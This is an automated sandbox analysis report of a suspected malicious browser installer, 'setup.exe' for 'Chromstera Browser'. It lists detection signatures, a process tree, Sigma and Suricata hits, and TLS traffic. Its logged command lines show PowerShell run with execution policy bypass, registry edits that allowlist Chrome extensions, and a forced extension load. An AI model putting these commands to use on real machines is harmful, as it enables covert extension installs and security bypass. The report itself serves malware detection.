Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1544057
MD5:8aca54559265d2a9ad0a810c425c644f
SHA1:39d22f9333c9682bb860cf644d66996f7a641666
SHA256:af11a10ef1964b801f070d073cf89f3b4e6eecab2943af9cb011151df65ecfd2
Infos:

Detection

Score:81
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:49
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MalDoc
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Chromium Browser Instance Executed With Custom Extension
Sigma detected: Suspicious Script Execution From Temp Folder
Uses cmd line tools excessively to alter registry or file data
Adds / modifies Windows certificates
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a Chrome extension
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Chromium Browser Instance Executed With Custom Extension
Sigma detected: Suspicious MsiExec Embedding Parent
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • setup.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 8ACA54559265D2A9AD0A810C425C644F)
    • setup.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1 MD5: 8ACA54559265D2A9AD0A810C425C644F)
  • msiexec.exe (PID: 7496 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7540 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DD3B85FC1F11BB110F90DDDEF4702234 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 5480 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7488 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7912 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 7964 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSI4739.tmp (PID: 7176 cmdline: "C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat" MD5: 514314174B6F6A3AB2195C456B83AA1E)
      • cmd.exe (PID: 7840 cmdline: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 1196 cmdline: REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 7944 cmdline: REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 2416 cmdline: REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 3332 cmdline: REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 7980 cmdline: REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • reg.exe (PID: 5472 cmdline: REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • chrome.exe (PID: 8064 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 5804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,10222868034098351333,13685129222229150854,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • timeout.exe (PID: 5852 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 6408 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 6220 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 1376 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 7768 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 764 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 7624 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 5560 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 5272 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 2308 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 6260 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 3248 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 6636 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 7112 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 5560 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 7288 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 5928 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 2736 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 3096 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 3448 cmdline: timeout 2 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • timeout.exe (PID: 1012 cmdline: timeout 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • MSIFB77.tmp (PID: 6236 cmdline: "C:\Windows\Installer\MSIFB77.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\edge.bat" MD5: 514314174B6F6A3AB2195C456B83AA1E)
      • cmd.exe (PID: 6484 cmdline: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ChromsteraUpdater.exe (PID: 8100 cmdline: "C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe" MD5: 427C459E138B4F33819558D451E8500E)
  • svchost.exe (PID: 8056 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 7668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2012,i,17522224552689378138,6417613085102451852,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4464 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1992,i,14024855596687576691,10802708795507051728,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
setup.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\Installer\6bc77d.msiJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      C:\Windows\Installer\6bc77d.msiJoeSecurity_MalDocYara detected MalDocJoe Security
        C:\Windows\Installer\MSICC46.tmpJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msiJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msiJoeSecurity_MalDocYara detected MalDocJoe Security

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              Process Memory Space: setup.exe PID: 7404JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                Process Memory Space: setup.exe PID: 7728JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  Process Memory Space: powershell.exe PID: 7964JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_7964.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7812, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5480, ProcessName: powershell.exe
                      Sigma detected: Suspicious Chromium Browser Instance Executed With Custom Extension
                      Source: Process startedAuthor: Aedan Russell, frack113, X__Junior (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", CommandLine|base64offset|contains: Zv, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7840, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", ProcessId: 8064, ProcessName: chrome.exe
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7812, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5480, ProcessName: powershell.exe
                      Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", CommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat", ParentImage: C:\Windows\Installer\MSI4739.tmp, ParentProcessId: 7176, ParentProcessName: MSI4739.tmp, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", ProcessId: 7840, ProcessName: cmd.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7912, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7964, ProcessName: powershell.exe
                      Sigma detected: Chromium Browser Instance Executed With Custom Extension
                      Source: Process startedAuthor: Aedan Russell, frack113, X__Junior (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", CommandLine|base64offset|contains: Zv, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7840, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper", ProcessId: 8064, ProcessName: chrome.exe
                      Sigma detected: Suspicious MsiExec Embedding Parent
                      Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7812, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 5480, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7912, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7964, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8056, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-28T19:11:31.949011+010028292021A Network Trojan was detected192.168.2.449734104.21.8.139443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: setup.exeAvira: detected
                      Multi AV Scanner detection for submitted file
                      Source: setup.exeReversingLabs: Detection: 41%

                      Compliance

                      barindex
                      Uses 32bit PE files
                      Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Creates a software uninstall entry
                      Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Chromstera Browser 1.0.0.0Jump to behavior
                      PE / OLE file has a valid certificate
                      Source: setup.exeStatic PE information: certificate valid
                      Uses secure TLS version for HTTPS connections
                      Source: unknownHTTPS traffic detected: 104.21.8.139:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:59273 version: TLS 1.2
                      Contains modern PE file flags such as dynamic base (ASLR) or NX
                      Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Binary contains paths to debug symbols
                      Source: Binary string: wininet.pdb source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, shi3105.tmp.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbR source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
